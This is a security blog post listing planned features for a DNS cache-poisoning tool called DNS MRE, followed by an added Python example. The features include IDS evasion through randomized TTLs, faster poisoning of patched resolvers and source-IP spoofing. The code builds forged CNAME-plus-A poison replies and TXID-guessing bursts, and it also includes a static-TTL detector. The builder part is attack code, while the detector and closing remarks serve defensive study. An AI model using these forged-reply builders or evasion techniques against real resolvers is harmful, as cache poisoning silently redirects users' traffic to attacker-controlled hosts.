
Enhancement Ideas for DNS MRE Tool

08/04/08, 05:32:38 am. Categories: dns, tools

Some people from the security community have commented on my tool DNS MRE (Multiple Race Exploiter). HD Moore, the original author of the Metasploit Project, pointed out what is unique about this tool: it can poison/overwrite the DNS cache by using a CNAME record in the answer section. He also noted the static TTL used in all fake replies, which makes an easy IDS/IPS signature. Tahir from HatSecurity pointed out the same thing about the static TTL.

Thanks for that.

The next version will contain the following features:

1- Automatic discovery of the name server IPs of the target domain. This only works if the attacked DNS server supports recursion. For a DNS server configured with a forwarder, the user (attacker/pentester) has to find the forwarder IP manually.

2- Randomized TTL values in all replies, or a user-chosen TTL value applied to all replies.

3- A better algorithm for attacking "patched" systems, that is, poisoning a patched system in the shortest possible time. This can take the following form:
* No sleep() between iterations
* No sleep() between a query and its replies (except maybe for the first iteration)
* Sending multiple queries before sending their corresponding replies

4- Concerning the source IP address of the replies, the user should be able to choose between:
* Using the local IP address
* Using static spoofed IP address
* Using dynamic spoofed IP addresses

5- Poisoning a DNS server that sends its queries with a DNSSEC OPT record (EDNS0, DO bit set) in the Additional section (the server is saying it is willing to accept DNSSEC, but does not require it).
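The in-bailiwick CNAME reply that HD Moore singled out, the randomized-TTL burst of feature 2, and the static-TTL check an IDS would apply, as an added Python example. This is not the DNS MRE tool's own code: the packet builder, the parser and the detector are written here for illustration, and the names (example.test), the attacker address (198.51.100.7, a TEST-NET address) and the TTLs are constructed. The example only builds and inspects packets; it sends and spoofs nothing.

```python
import random
import struct

# RR type codes used below (RFC 1035).
TYPE_A = 1
TYPE_NS = 2
TYPE_CNAME = 5


def encode_name(name):
    """Encode a dotted name as DNS labels (no compression pointers)."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt, off):
    """Decode a name at offset, following 0xC0 compression pointers so real
    replies parse too. Returns (name, offset just past the name field)."""
    labels, jumped, end = [], False, None
    while True:
        length = pkt[off]
        if (length & 0xC0) == 0xC0:            # two-byte compression pointer
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)


def build_query(txid, qname, qtype=TYPE_A):
    """Recursive query (RD=1); with qtype=TYPE_NS this is the probe feature 1
    would send through the victim resolver to locate the target's servers."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def rr(name, rtype, ttl, rdata):
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def build_poison_reply(txid, qname, target, attacker_ip, ttl):
    """Forged authoritative answer: the throwaway qname is a CNAME for the
    real target, and the same answer section carries the target's A record
    pointing at the attacker. Both names are inside the target's zone, so a
    resolver that accepts the reply caches the forged A record."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 2, 0, 0)   # QR=1, AA=1
    question = encode_name(qname) + struct.pack("!HH", TYPE_A, 1)
    answer = rr(qname, TYPE_CNAME, ttl, encode_name(target))
    answer += rr(target, TYPE_A, ttl, bytes(int(o) for o in attacker_ip.split(".")))
    return header + question + answer


def parse_reply(pkt):
    """Minimal parser: returns (txid, flags, qname, [(name, type, ttl, rdata)])."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off, qname = 12, ""
    for _ in range(qd):
        qname, off = decode_name(pkt, off)
        off += 4                               # skip QTYPE and QCLASS
    answers = []
    for _ in range(an):
        name, off = decode_name(pkt, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        if rtype in (TYPE_CNAME, TYPE_NS):
            rdata, _ = decode_name(pkt, off)
        elif rtype == TYPE_A:
            rdata = ".".join(str(b) for b in rdata)
        off += rdlen
        answers.append((name, rtype, ttl, rdata))
    return txid, flags, qname, answers


def forge_burst(qname, target, attacker_ip, txids, ttl=None, rng=random):
    """One forged reply per guessed TXID for a single probe query. ttl=None
    draws a fresh random TTL per reply (feature 2); an int fixes the TTL."""
    return [build_poison_reply(t, qname, target, attacker_ip,
                               ttl if ttl is not None else rng.randint(300, 86400))
            for t in txids]


def static_ttl_burst(replies, threshold=16):
    """Detector side: many answers for one qname, with distinct TXIDs but a
    single shared TTL, is the static-TTL signature noted above."""
    txids, qnames, ttls = set(), set(), set()
    for pkt in replies:
        txid, _, qname, answers = parse_reply(pkt)
        txids.add(txid)
        qnames.add(qname)
        ttls.update(ttl for _, _, ttl, _ in answers)
    return (len(replies) >= threshold and len(txids) >= threshold
            and len(qnames) == 1 and len(ttls) == 1)
```

Randomizing the TTL defeats only the specific signature named in the post; the burst itself (many replies for one qname, distinct TXIDs, identical question) remains visible to a sensor that correlates on the other fields, which is why feature 2 narrows rather than removes the detection surface.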


This is the Blog of Securebits Think-Tank. It is maintained by AR
